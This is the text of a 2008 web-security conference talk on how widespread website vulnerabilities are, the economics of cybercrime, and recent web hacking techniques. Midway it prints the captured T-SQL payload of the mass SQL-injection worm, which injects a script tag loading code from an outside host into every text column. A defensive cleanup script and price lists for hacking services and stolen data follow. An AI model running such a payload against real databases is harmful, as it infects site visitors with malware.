© 2008 WhiteHat Security, Inc.
Hacks Happen
Jeremiah Grossman
WhiteHat Security founder & CTO
blog: http://jeremiahgrossman.blogspot.com/
email: [email protected]

0wN3d!!1
1998's best practices:
Don't write your own crypto algorithms
Don't run web servers as root
Use Secure Sockets Layer (SSL)
Have proper file system permissions

Wait, how does this make a website secure?
What’s input validation?
Probably Cross-Site Scripting
Will hack for T-Shirt :)
I made $14 an hour
Job Description: Hack Everything!
Official Title: “the hacker yahoo”
...and play foosball
...No articles...
...No white papers...
...No methodologies...
NOTHING!

...except for a hacker named rain.forest.puppy writing about an obscure attack called SQL Injection.
How I hacked PacketStorm
http://packetstormsecurity.nl/0002-exploits/rfp2k01.txt
Protect this website and the ~599 others
Find the vulnerabilities before the bad guys
Job security
Web Application Security Consortium
http://www.webappsec.org
Open Web Application Security Project
http://www.owasp.org/
“ There is no "secure development lifecycle" in the vast majority of universities' degree programs - that is, security is not "baked into" graduates of relevant programs (e.g., computer science) throughout their degree programs. And that is a problem, perhaps the problem plaguing the software industry.”
Mary Ann Davidson, Chief Security Officer at Oracle
The Supply Chain Problem
http://blogs.oracle.com/maryanndavidson/2008/04/08#a286
17 million programmers worldwide
Writing 6,000 lines of code per year (each)
17 million programmers worldwide
http://www.itjungle.com/tlb/tlb011607-story06.html
http://deepfreeze9.blogspot.com/2007/08/factoid-19-million-programmers-by-2010.html
http://blogs.zdnet.com/ITFacts/?p=12808
U.S. Department of Labor Bureau of Labor Statistics - Computer Programmers
http://www.bls.gov/oco/ocos110.htm
~6 KLOC per year per developer
http://blogs.msdn.com/philipsu/archive/2006/06/14/631438.aspx
http://fixunix.com/linux/370267-attackers-hose-down-microsoft-s-jet-db-engine-5.html
http://blogs.msdn.com/eldar/archive/2006/07/07/647858.aspx
Windows 2000: 29 million lines
Red Hat Linux 7.1: 30 million
Windows XP: 40 million
Windows Vista: 50 million
Mac OS X 10.4: 86 million
17 million programmers x 6,000 lines each = 102 billion new lines of code pushed per year
Source lines of code
http://en.wikipedia.org/wiki/Source_lines_of_code
Conservative research says: 1 security defect for every 10,000 lines of code
1 vulnerability per 10 KLOC
http://www.informationweek.com/story/showArticle.jhtml?articleID=205600229&cid=RSSfeed_IWK_All
http://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html

(potentially) new undiscovered vulnerabilities (102 billion lines / 10 KLOC):
10,200,000 per year
850,000 per month
28,000 per day
In 2007 IBM X-Force reported 6,437 vulnerabilities
Total vulnerabilities EVER reported in the National Vulnerability Database: 32,000
CVE publication rate: 16 vulnerabilities / day
IBM Internet Security Systems X-Force 2007 Trend Statistics
http://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf
National Vulnerability Database
http://nvd.nist.gov/
If only 1% of new undiscovered vulnerabilities are exploitable:
102,000 zero-days per year

Location of the other ~95,000 zero-days (the ones nobody reported): unknown
172,000,000 websites
millions more added per month
June 2008 Web Server Survey
http://news.netcraft.com/archives/2008/06/22/june_2008_web_server_survey.html
809,000 websites use SSL
protecting passwords, credit card numbers, social security numbers, and our email (if we're lucky).
Extended Validation SSL Certificates now 1 Year Old
http://news.netcraft.com/archives/2008/02/17/extended_validation_ssl_certificates_now_1_year_old.html
9 out of 10 websites have vulnerabilities allowing hackers unauthorized access
WhiteHat Security Website Security Statistics Report (March)
https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
“A 2007 report from NTA Monitor found that 90 percent of UK-based company websites harboured at least one weakness that could allow hackers to gain unauthorised access.”
http://www.continuitycentral.com/feature0555.htm
70% of websites at immediate risk of being hacked!
http://www.acunetix.com/news/security-audit-results.htm
http://www.heise-online.co.uk/news/Every-second-web-application-contains-between-one-and-ten-holes--/110515
http://www.symantec.com/business/theme.jsp?themeid=threatreport
hacked
If there's just 1 vulnerability on 90% of the SSL websites... (other reports say an average of 7)
728,100 total vulnerabilities
WhiteHat Security Website Security Statistics Report (March)
https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
XSSed.com has reported:
20,843 total vulnerabilities
1,072 fixed (5%)
http://www.xssed.com/
“SSL is like using an armored truck to transport rolls of pennies between someone on a park bench and someone doing business from a cardboard box.”
Eugene H. Spafford, Professor Purdue University - 2002
“[Application security] is one of the most serious and often overlooked risks facing government and commercial organizations. The root cause of these risks is not flawed software, but software development processes that pay little or no attention to security."
Jeff Williams, OWASP Chair - 2003
“The reason is that bad software lies at the heart of all computer security problems, and more and more bad software is being produced. Traditional solutions simply treat the symptoms, not the problem, and usually do so in a reactive way.”
Gary McGraw, CTO of Cigital - 2001
A new infected web page is discovered every 5 seconds, 24 hours a day, 365 days a year
Over 79% of websites hosting malicious code are legitimate (compromised by attackers)
Sophos: One Web page infected every five seconds
http://news.zdnet.com/2424-1009_22-198647.html
In 2006, 0.3% of all Internet queries returned at least one URL containing malicious content.
2007 - 1.3%
2008 - ?
How Unsecure Is The Web?
http://blogs.forrester.com/srm/2008/03/how-unsecure-is.html
Kraken: 400,000 infected computers
Srizbi: 315,000 infected computers
Storm: 200,000 infected computers
2nd generation malware
Vint Cerf: one quarter of all computers part of a botnet
http://arstechnica.com/news.ars/post/20070125-8707.html
http://www.fbi.gov/cyberinvest/protect_online.htm
Mass SQL Injection
1. Google recon for weak websites (*.asp, *.php)
2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.
3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server, infecting their machine with trojans.
4. Botnets form, which then continue SQL injecting websites
http://blogs.zdnet.com/security/?p=1150
http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html
http://blogs.zdnet.com/security/?p=1122
http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html
The injected payload (T-SQL, as captured; comments added here to explain what each part does):

DECLARE @T varchar(255), @C varchar(255);
-- Enumerate every text-type column of every user table in the database
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u'        -- 'u' = user table
      AND (b.xtype = 99 OR b.xtype = 35 OR     -- ntext, text
           b.xtype = 231 OR b.xtype = 167);    -- nvarchar, varchar
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
    -- Append the script tag to every row of the column. Note that
    -- convert(varchar, ...) without a length defaults to varchar(30), so any
    -- value longer than 30 characters is silently truncated before the tag
    -- is appended; the damage is lossy, not just additive.
    EXEC('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

Skeleton key unlocks Microsoft SQL servers in latest Web attack
http://www.news.com/8301-10789_3-9938224-57.html
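As an added example (not part of the original talk and not the captured payload), here is the defensive mirror of that cursor: it walks the same user-table/text-column set the worm walked, reports which columns now contain the injected tag, and strips it only when @fix is set. It assumes a SQL Server 2000/2005 instance with the same sysobjects/syscolumns catalog the payload used, tables in the dbo schema, and that the marker string is the one in the payload above; @marker, @fix, @hits and Col_Cursor are names this example introduces.

```sql
-- Added example, not from the talk: find (and optionally remove) the tag the
-- mass-SQL-injection payload appended to every text column.
-- Assumptions: SQL Server 2000/2005 system tables, tables in the dbo schema,
-- and the marker below matches the tag actually observed in the data.
SET NOCOUNT ON;

DECLARE @marker varchar(255), @fix bit;
SET @marker = '<script src=http://evilsite.com/1.js></script>';
SET @fix = 0;   -- 0 = report only; 1 = also strip the tag from varchar/nvarchar columns

DECLARE @T sysname, @C sysname, @ct int, @n int, @sql nvarchar(4000);
DECLARE @hits TABLE (TableName sysname, ColumnName sysname, ColType int, RowsHit int);

-- Same selection the payload used: user tables, text-type columns
DECLARE Col_Cursor CURSOR FOR
    SELECT a.name, b.name, b.xtype
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u'
      AND b.xtype IN (99, 35, 231, 167);       -- ntext, text, nvarchar, varchar
OPEN Col_Cursor;
FETCH NEXT FROM Col_Cursor INTO @T, @C, @ct;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers go through QUOTENAME and the marker travels as an
    -- sp_executesql parameter, so this script is not itself injectable.
    -- LIKE (unlike CHARINDEX/REPLACE) accepts text and ntext columns.
    SET @sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@T)
             + N' WHERE ' + QUOTENAME(@C) + N' LIKE ''%'' + @m + ''%''';
    EXEC sp_executesql @sql, N'@m varchar(255), @n int OUTPUT',
         @m = @marker, @n = @n OUTPUT;

    IF @n > 0
    BEGIN
        INSERT INTO @hits VALUES (@T, @C, @ct, @n);
        -- REPLACE does not accept text/ntext (35, 99); those are reported only
        IF @fix = 1 AND @ct IN (167, 231)
        BEGIN
            SET @sql = N'UPDATE ' + QUOTENAME(@T) + N' SET ' + QUOTENAME(@C)
                     + N' = REPLACE(' + QUOTENAME(@C) + N', @m, '''')'
                     + N' WHERE ' + QUOTENAME(@C) + N' LIKE ''%'' + @m + ''%''';
            EXEC sp_executesql @sql, N'@m varchar(255)', @m = @marker;
        END
    END
    FETCH NEXT FROM Col_Cursor INTO @T, @C, @ct;
END
CLOSE Col_Cursor;
DEALLOCATE Col_Cursor;

-- Every column that still carries the marker, worst first
SELECT TableName, ColumnName, ColType, RowsHit FROM @hits ORDER BY RowsHit DESC;
```

Run it read-only first (@fix = 0) and review the hit list before flipping the switch. Two caveats a practitioner should expect: text/ntext columns are only reported, since REPLACE will not operate on them; and because the payload's convert(varchar, ...) already cut each value to 30 characters, stripping the tag recovers only what survived the truncation, so anything longer has to come back from a backup taken before the injection. The tag is an indicator, not the whole compromise: the dynamic SQL that let the worm in is still open until those queries are parameterized.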
China-based online “Password Recovery” services: you pay them to hack into “your” account.
1. 300 Yuan ($43) to break an overseas mailbox password, with 85% probability of success.
2. 200 Yuan ($29) to break a domestic mailbox password, with 90% probability of success.
3. 1000 Yuan ($143) to break a company's mailbox password (no success rate given).
Also on the menu: passwords for 163, 126, QQ, Yahoo, Sohu, Sina, TOM, Hotmail, MSN… etc.
http://www.thedarkvisitor.com/2008/04/mailbox-passwords-for-sale-chinese-hacker-business-or-scam/
http://news.cnnb.com.cn/system/2008/04/14/005548493.shtml
Hire to Hack http://www.hire2hack.net/
Variable project-based pricing $150 (USD) minimum. They accept Western Union.
Insider: someone with a fiduciary role at a company, such as a corporate executive, investment banker or attorney.
Not a hacker
Hacker holds onto ill-gotten gains thanks to US courts
http://www.theregister.co.uk/2008/02/19/insider_trading_catch22
PayPal or eBay Acct: $8
Credit cards w/ CVV & exp: $25
Bank Acct: $1,000
World of Warcraft level-70 Acct: $4

0-Days
WMF Exploit: $4,000
RealPlayer 11: $10,000
OS X: $10,000 + a 15-inch MacBook Pro
Windows Vista: $50,000
Internet Explorer: $100,000
What Microsoft pays for 0-days... $0

http://www.bestsecuritytips.com/news+article.storyid+116.htm
http://securitywatch.eweek.com/browsers/russian_firm_demos_realplayer_zeroday_exploit.html
http://blogs.technet.com/security/archive/2008/04/10/rsa-2008-keynote-john-thompson.aspx
http://www.theregister.co.uk/2007/04/20/pwn-2-own_winner/
http://www.arnnet.com.au/index.php/id;741896054;pp;2;fp;4194304;fpid;1
http://www.letemps.ch/template/economie.asp?page=9&article=228747
Average window of exposure (before vendors patch) for well-known vulnerabilities: 55 days
80% of exploits are available within 19 days of disclosure.
IBM Internet Security Systems X-Force 2007 Trend Statistics
http://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf
[Chart: percentage likelihood that a website has a particular vulnerability, by class]
WhiteHat Security Website Security Statistics Report (March)
https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
[Chart: Security in the SDLC. Source: Software Security, by Gary McGraw]
Studies indicate that 75% of security breaches are due to flaws in software.
90% of IT security spending is on perimeter security such as firewalls.
Insanity - Doing the Same Thing Over and Over Again Expecting a Different Result
http://blogs.csoonline.com/insanity_doing_the_same_thing_over_and_over_again_expecting_a_different_result
Application security trend report for q4 2007
http://www.cenzic.com/pdfs/Cenzic_AppSecTrends_Q4-07.pdf
Facing up to the threat of cyber-crime
http://www.continuitycentral.com/feature0555.htm
VA + WAF
Website Defacements
493,000 in 2005
752,000 in 2006
480,000 in 2007
roughly one defacement every minute
http://www.zone-h.org/content/view/14928/30/
http://www.infoworld.com/article/07/11/26/Another-inconvenient-truth-Al-Gores-Web-site-hacked_1.html
http://news.netcraft.com/archives/2008/04/21/hacker_redirects_barack_obamas_site_to_hillaryclintoncom.html
http://www.scmagazineus.com/XSS-flaw-on-Obama-page-sends-visitors-to-Clinton-site/article/109309/
[Chart: Average Time to Fix in Days; axis marks at 180, 270, 365]
WhiteHat Security Website Security Statistics Report (March)
https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
Options after a vulnerability is found, but before we're able to fix it:
1. Take the website down
2. Revert to an older version of the website/code (if secure)
3. Stay up while exposed
Too much code, too few application security specialists
http://www.regdeveloper.co.uk/2008/05/28/agile_security/
Lack of control
IT Security:
Responsible for the security of the website(s)
Justifies resource allocation to the business owners
Promotes security inside the SDLC via policy and education
But:
Network security solutions don't work for web applications
Can't fix the vulnerabilities without developer involvement
Developers don't work for them
Welcome to Web 2.0
Ajax, Silverlight, Flash/Flex, Ruby on Rails, Dojo, C#, JavaScript, JSON, OpenID, Widgets, SaaS, HTML5, Python, J2EE, MooTools, RSS, Social Networks, OpenSocial
Bill rate for a source code reviewer: $150 (US) per hour
Source code review for the average small to mid-sized website: $25,000 (US), i.e. ~167 hours
To cover 10% of the SSL websites (~80,000)...
Total man hours: 13,360,000
Source code reviewers: 6,680 (at ~2,000 hours per reviewer per year)
Annual economic burden: $2,000,000,000 (US)
If all new code is inspected to find 1 undiscovered vulnerability every 60 seconds... we'd never find them all.
Even at one every 10 seconds, it would take about 3 years to find all the new vulnerabilities for just this year.
And then we still have to fix the vulnerabilities.
Hackers just need to exploit one to get in.
Starting in 2006, the DHS spent $300,000 (US) on a project to find and fix security defects in 180 open source projects.
Found 1 security defect per 1,000 lines (not 10,000)
7,826 defects fixed
$38 per vulnerability
By 2012 over 90% of enterprises will use open source
Open Source Code Contains Security Holes
http://www.informationweek.com/news/security/showArticle.jhtml?articleID=205600229&_requestid=87046
http://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html
Gartner: Open source will quietly take over
http://news.zdnet.co.uk/software/0,1000000121,39379900,00.htm
Conservative estimates put the total annual IT security spend in the US at $50 billion and e-crime losses at $100 billion.
We're losing two dollars for every dollar spent.
Facing up to the threat of cyber-crime
http://www.continuitycentral.com/feature0555.htm
Calculating the Costs of Cyber Crime
http://blog.washingtonpost.com/securityfix/2007/09/counting_the_cost_of_cyber_cri.html
Change does not happen overnight
From: Bill Gates
Sent: Tuesday, January 15, 2002 5:22 PM
To: Microsoft and Subsidiaries: All FTE
Subject: Trustworthy computing

Secure Code ROI
Reduce Costs
Increased Revenue
Loss Avoidance
Policy Compliance
(2006 and 2007) New Web Hacking Techniques

2006:
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Stealing Search Engine Queries with JavaScript
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
JavaScript Port Scanning
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
JavaScript Portscanning and bypassing HTTP Auth
Bruteforcing HTTP Auth in Firefox with JavaScript
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
Adultspace XSS Worm
CSS History Stealing Acts As Cookie
Detecting FireFox Extensions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Browser Port Scanning without JavaScript
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
Network Scanning with HTTP without JavaScript
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Governator Hack
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Selecting Encoding Methods For XSS Filter Evasion
2007:
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again
Cross-Site Printing (Printer Spamming)
Stealing Pictures with Picasa
HScan Redux
ISO-8895-1 Vulnerable in Firefox to Null Injection
MITM attack to overwrite addons in Firefox
Microsoft ASP.NET Request Validation Bypass Vulnerability (POC)
Non-Alpha-Non-Digit 3
Steal History without JavaScript
Pure Java™, Pure Evil™ Popups
Google Adsense CSRF hole
There's an OAK TREE in my blog!?!?!
BK for Mayor of Oak Tree View
Google Docs puts Google Users at Risk
All Your Google Docs are Belong To US…
Java Applets and DNS Rebinding
Scanning internal Lan with PHP remote file opening.
Firefox File Handling Woes
Firefoxurl URI Handler Flaw
Bugs in the Browser: Firefox's DATA URL Scheme Vulnerability
Multiviews Apache, Accept Requests and free listing
Optimizing the number of requests in blind SQL injection
Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)
Port Scan without JavaScript
Favorites Gone Wild
Login Detection without JavaScript
Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
Username Enumeration Timing Attacks (Sensepost)
Google GMail E-mail Hijack Technique
Recursive Request DoS
Exaggerating Timing Attack Results Via GET Flooding
Initiating Probes Against Servers Via Other Servers
Effects of DNS Rebinding On IE's Trust Zones
Paper on Hacking Intranets Using Websites (Not Web Browsers)
More Port Scanning - This Time in Flash
HTTP Response Splitting and Data: URI scheme in Firefox
Res:// Protocol Local File Enumeration
Res Timing Attack
IE6.0 Protocol Guessing
IE 7 and Firefox Browsers Digest Authentication Request Splitting
Hacking Intranets Via Brute Force
Hiding JS in Valid Images
Internet Archiver Port Scanner
Noisy Decloaking Methods
Code Execution Through Filenames in Uploads
Cross Domain Basic Auth Phishing Tactics
Additional Image Bypass on Windows
Detecting users via Authenticated Redirects
Passing Malicious PHP Through getimagesize()
Turn Any Page Into a Greasemonkey Popup
Enumerate Windows Users In JS
Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH
Iframe HTTP Ping
Read Firefox Settings (PoC)
Stealing Mouse Clicks for Banner Fraud
(Non-Persistent) Untraceable XSS Attacks
Inter Protocol Exploitation
Detecting Default Browser in IE
Bypass port blocking in Firefox, Opera and Konqueror.
LocalRodeo Detection
Image Names Gone Bad
IE Sends Local Addresses in Referer Header
PDF XSS Can Compromise Your Machine
Universal XSS in Adobe's Acrobat Reader Plugin
Firefox Popup Blocker Allows Reading Arbitrary Local Files
IE7.0 Detector
overwriting cookies on other people's domains in Firefox.
Embeding SVG That Contains XSS Using Base64 Encoding in Firefox
Firefox Header Redirection JavaScript Execution
More URI Stuff… (IE's Resouce URI)
Hacking without 0days: Drive-by Java
Google Urchin password theft madness
Username Enumeration Vulnerabilities
Client-side SQL Injection Attacks
Content-Disposition Hacking
Flash Cookie Object Tracking
Java JAR Attacks and Features
Severe XSS in Google and Others due to the JAR protocol issues
Web Mayhem: Firefox's JAR: Protocol issues (bugzilla)
0DAY: QuickTime pwns Firefox
Exploiting Second Life
Injecting the script tag into XML
Cross-Browser Proxy Unmasking
Spoofing Firefox protected objects

Top Ten Web Hacks of 2007 (Official)
http://jeremiahgrossman.blogspot.com/2008/01/top-ten-web-hacks-of-2007-official.html
Top 10 Web Hacks of 2006
http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html
Website            Founded
Amazon             1994
Yahoo              1995
eBay               1995
Bank of America    1997
Google             1998
MySpace            2003
YouTube            2005

Vulnerability / Attack          Year well-known
Buffer Overflow                 1996
Command Injection               1996
SQL Injection                   2004
XSS                             2005
Predictable Resource Location   ?
HTTP Response Splitting         2005 / ?
CSRF                            ?

Most major websites were launched before significant classes of attack were “well-known”
The bad guys do
"Personally, I'd love to see everyone go through an OWASP-based source-code review, but certainly, that's not going to happen."
Bob Russo, PCI Standards Council General Manager
Next version of PCI DSS due in September
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1309120,00.html?track=sy160&asrc=RSS_RSS-10_160
Get Rich or Die Trying"Making Money on The Web, The Black Hat Way"
by Jeremiah Grossman, Arian Evans
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-schedule.html
don’t let them scare you
The Good News
http://www.webappsec.org/
Web Security Mailing List (2,600+ subscribers)
Threat Classification (v2 in progress)
Statistics (additional vendors coming on board)
Web Application Firewall Evaluation Criteria (v2 in progress)
Web Hacking Incident Database
Distributed Open Proxy Honeypot
PCI-DSS 6.6
AppSec Conferences
OWASP Chapters
SANS
WASC Meet-Ups
Google Calendar: InfoSec Events in North America
https://www.google.com/calendar/embed?src=s7j59ntjl7lbae0517luaa6fk0%40group.calendar.google.com&ctz=America/Los_Angeles
http://metasploit.com/users/hdm/tools/debian-openssl/
http://www.theregister.co.uk/2008/05/21/massive_debian_openssl_hangover/
http://blogs.zdnet.com/security/?p=1102
For more information visit: www.whitehatsec.com/
Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com/
email: [email protected]
Thank You